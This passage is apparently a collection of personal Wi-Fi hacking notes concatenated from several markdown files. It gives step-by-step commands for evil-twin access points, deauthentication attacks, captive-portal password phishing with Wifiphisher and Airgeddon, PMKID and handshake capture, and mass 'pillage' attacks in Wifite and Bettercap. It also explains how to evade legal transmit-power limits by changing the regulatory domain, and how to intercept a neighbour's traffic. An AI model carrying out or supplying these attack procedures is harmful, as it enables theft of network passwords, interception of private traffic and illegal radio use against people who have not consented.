workload profile. If your computer suffers performance issues, you can lower the number in the -w argument. 126 | 127 | Next, the --force option ignores any warnings to proceed with the attack, and the last part of the command specifies the password list we're using to try to brute force the PMKIDs in our file, in this case, called "topwifipass.txt." 128 | 129 | Online cracking: 130 | 131 | https://gpuhash.me/ 132 | -------------------------------------------------------------------------------- /wifi/fake_ap.md: -------------------------------------------------------------------------------- 1 | # Fake Wifi AP 2 | 3 | ## MitmAP: 4 | 5 | On Git folder: 6 | 7 | git clone https://github.com/xdavidhu/mitmAP 8 | cd mitmAP 9 | ip a (info about interface) 10 | python3 mitmAP.py (execute) 11 | 12 | ## Aircrack-ng: 13 | 14 | Scan the network and wait for the client connect the network. 15 | 16 | iwconfig 17 | airmon-ng start wlan0 18 | airodump-ng wlan0mon 19 | 20 | Create a new AP with same SSID & MAC address 21 | 22 | airbase-ng -a 00:09:5B:6F:64:1E --essid "Elroy" -c 11 mon0 23 | 24 | where 00:09:5B:6F:64:1E is the BSSID, Elroy is the SSID, and -c 11 is the channel of the suspect's AP. 25 | 26 | Deauthentication or Bumping Him Off: 27 | 28 | aireplay-ng --deauth 0 -a 00:09:5B:6F:1E 29 | 30 | note that we once again used his BSSID in the aireplay-ng command. If our signal is stronger than his own AP, he will automatically reconnect to our evil twin! 31 | 32 | Turn Up the Power: 33 | 34 | iwconfig wlan0 txpower 27 35 | 36 | this command will boost our power output to the maximum legally allowable in the United States, 27 dBm or 500 milliwatts. 37 | 38 | In some cases, even boosting power to 500 mWs may prove to be inadequate. If we try to turn up the power to the maximum on our Alfa wireless cards—1,000 mWs or 30 dBm—we get the error message below (some of the newer cards can actually transmit at 2,000 mWs or four times what is legally allowable in the U.S.). 39 | 40 | iwconfig wlan0 txpower 30 41 | 42 | This next step is illegal in the U.S., so be careful using it unless you have specific permission or are a member of law enforcement. 43 | 44 | Every nation has its own set of Wi-Fi regulations. Some allow more power and more channels than the U.S. For instance, Bolivia allows the use of channel 12 and a full 1,000 mWs of power. We can get our Alfa card to use Bolivian regulations by simply typing: 45 | 46 | iw reg set BO 47 | 48 | Now that we are in Bolivian regulatory domain, we can boost our power to its maximum by typing: 49 | 50 | iwconfig wlan0 txpower 30 51 | iwconfig (check output) 52 | 53 | Now that we have our neighbor connected to our AP, we can take the next steps toward detecting his activity. 54 | 55 | We can use software like Ettercap to conduct a man-in-the middle attack. This way, we can intercept, analyze, and even inject traffic to this user. In other words, because he has connected to our AP, we have almost total access to his data both coming and going. If he really is downloading or selling child porn, we can intercept it. -------------------------------------------------------------------------------- /wifi/frameworks.md: -------------------------------------------------------------------------------- 1 | # Wifi Frameworks 2 | 3 | ## Wifite 4 | 5 | https://github.com/derv82/wifite2 6 | 7 | ## Airgeddon 8 | 9 | https://github.com/v1s1t0r1sh3r3/airgeddon 10 | 11 | ## Lazy Script 12 | 13 | https://github.com/arismelachroinos/lscript 14 | 15 | ## Bettercap 16 | 17 | https://github.com/bettercap/bettercap -------------------------------------------------------------------------------- /wifi/phishing.md: -------------------------------------------------------------------------------- 1 | # Wifi Phishing 2 | 3 | ## Wifiphisher: 4 | 5 | Install it with one of this two method: 6 | 7 | - apt install wifiphisher (direct install) 8 | 9 | - git clone https://github.com/wifiphisher/wifiphisher.git (from git repository) 10 | - cd wifiphisher 11 | - sudo python setup.py install 12 | 13 | Use: 14 | 15 | - wifiphisher --help 16 | - sudo wifiphisher -i wlan0 (no monitor mode) 17 | 18 | - select the network (from GUI) 19 | - select 'Firmware Upgrade Page' 20 | 21 | After selecting the attack, it will immediately launch. A page will open to monitor for targets joining the network. Wifiphisher will also listen for devices trying to connect to networks that aren't present, and it will create fake versions to lure those devices into connecting. 22 | 23 | After a target joins, a pop-up will demand they enter the password. 24 | 25 | When the target enters the password, we're notified in the Wifiphisher screen. 26 | 27 | ## Airgeddon: 28 | 29 | - apt-get install ccze 30 | 31 | On your git folder: 32 | 33 | - git clone https://github.com/v1s1t0r1sh3r3/airgeddon.git 34 | - cd airgeddon 35 | - sudo bash ./airgeddon.sh 36 | 37 | Then from interactive console: 38 | 39 | - Install all missing package manualy if necessary with apt-get install "package name" 40 | 41 | - Select an interface to work with 42 | - Press 2 and Enter to put your wireless card into monitor mode 43 | - Next, select option 7 and Enter for the "Evil Twin attacks" menu 44 | - select option 9 and Enter for the "Evil Twin AP attack with a captive portal." 45 | - Select the number of the target you wish to attack, and press Enter to proceed to the next screen. 46 | - Select 2 Deauth aireplay attack 47 | - No need to spoof MAC address 48 | - Get a handshake 49 | - Do a desauthentification attack 50 | - and continu running the script to the end 51 | 52 | Now, if we don't already have a handshake for this network, we'll have to capture one now. 53 | 54 | Once the capture process has started, a window with red text sending deauth packets and a window with white text listening for handshakes will open. You'll need to wait until you see "WPA Handshake:" and then the BSSID address of your targeted network. In the example below, we're still waiting for a handshake. 55 | 56 | Once you see that you've got the handshake, you can exit out of the Capturing Handshakewindow. When the script asks you if you got the handshake, select Y, and save the handshake file. Next, select the location for you to write the stolen password to, and you're ready to go to the final step of configuring the phishing page. 57 | 58 | Set up the phishing page, when someone connect to the fake network you'll get the password. -------------------------------------------------------------------------------- /wifi/sniffing.md: -------------------------------------------------------------------------------- 1 | # Wifi Sniffing 2 | 3 | ## Airmon 4 | 5 | ```bash 6 | airmon-ng 7 | airmon-ng start wlan0mon 8 | airmon-ng stop wlan0mon 9 | airmon-ng start wlan0mon 9 (channel 9) 10 | ``` 11 | 12 | Disable all network services for monitor mode: 13 | 14 | ```bash 15 | airmon-ng check kill 16 | ``` 17 | 18 | ## Airodump 19 | 20 | ```bash 21 | airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk wlan0mon 22 | ``` 23 | 24 | ## Aireplay 25 | 26 | ```bash 27 | aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 wlan0mon 28 | ``` 29 | 30 | ## Airdecap-ng 31 | 32 | ```bash 33 | airdecap-ng -e 'the ssid' -p passphrase tkip.cap 34 | ``` 35 | 36 | The capture file must contain a valid four-way handshake. For this purpose having (packets 2 and 3) or (packets 3 and 4) will work correctly. In fact, you don't truly need all four handshake packets. 37 | 38 | As well, only data packets following the handshake will be decrypted. This is because information is required from the handshake in order to decrypt the data packets. 39 | 40 | ## Wash 41 | 42 | Can be used to know if WPS is actived on router 43 | 44 | ```bash 45 | sudo wash -i wlan0mon 46 | ``` 47 | 48 | ## Wifite 49 | 50 | Automated tools to get all the handshakes of network we scan. 51 | 52 | Can be use with other softwares to send the handshakes in a special format on a website to crack the WI-FI password using a lot of connected servers. 53 | 54 | ```bash 55 | sudo wifite --dict '/home/kali/Downloads/custom-smprepchar-app0-100.txt' --clients-only --power 27 --bully --wps --infinite -p 30 56 | ``` 57 | 58 | ### Infinite mode 59 | 60 | Loop and continue after each attack. (scan 60 sec) 61 | 62 | ```bash 63 | sudo wifite -inf -mac -p 60 --kill --clients-only --no-wps --no-pmkid --skip-crack 64 | ``` 65 | 66 | ### Pillage mode 67 | 68 | Attack all wireless with connected clients after 5 minutes scan. 69 | 70 | ```bash 71 | sudo wifite -mac -p 300 --kill --clients-only --no-wps --no-pmkid --skip-crack 72 | ``` 73 | 74 | ## Hxcdump 75 | 76 | Use Hxcdump to Capture PMKIDs from Local Networks 77 | 78 | ```bash 79 | sudo airmon-ng start wlan0 80 | 81 | sudo hcxdumptool -i wlan0mon -o capture.pcapng --enable_status=1 82 | ``` 83 | 84 | ## Lazy Script 85 | 86 | ```bash 87 | cd (back to user folder) 88 | git clone https://github.com/arismelachroinos/lscript.git 89 | cd lscript 90 | chmod +x install.sh 91 | ./install.sh 92 | ``` 93 | 94 | 95 | ## Bettercap 96 | 97 | Get handshakes easily for all networks 98 | 99 | ```bash 100 | sudo bettercap --iface wlan1mon 101 | help wifi 102 | wifi.recon on (wifi sniffing) 103 | wifi.show 104 | wifi.deauth all (interface deauthentification) 105 | set wifi.handshakes '/desiredfolderlocation' (choose directory for hanhshakes) 106 | 107 | wifi.assoc all (PMKID Attack) (use all or MAC address) 108 | wifi.show 109 | ``` 110 | --------------------------------------------------------------------------------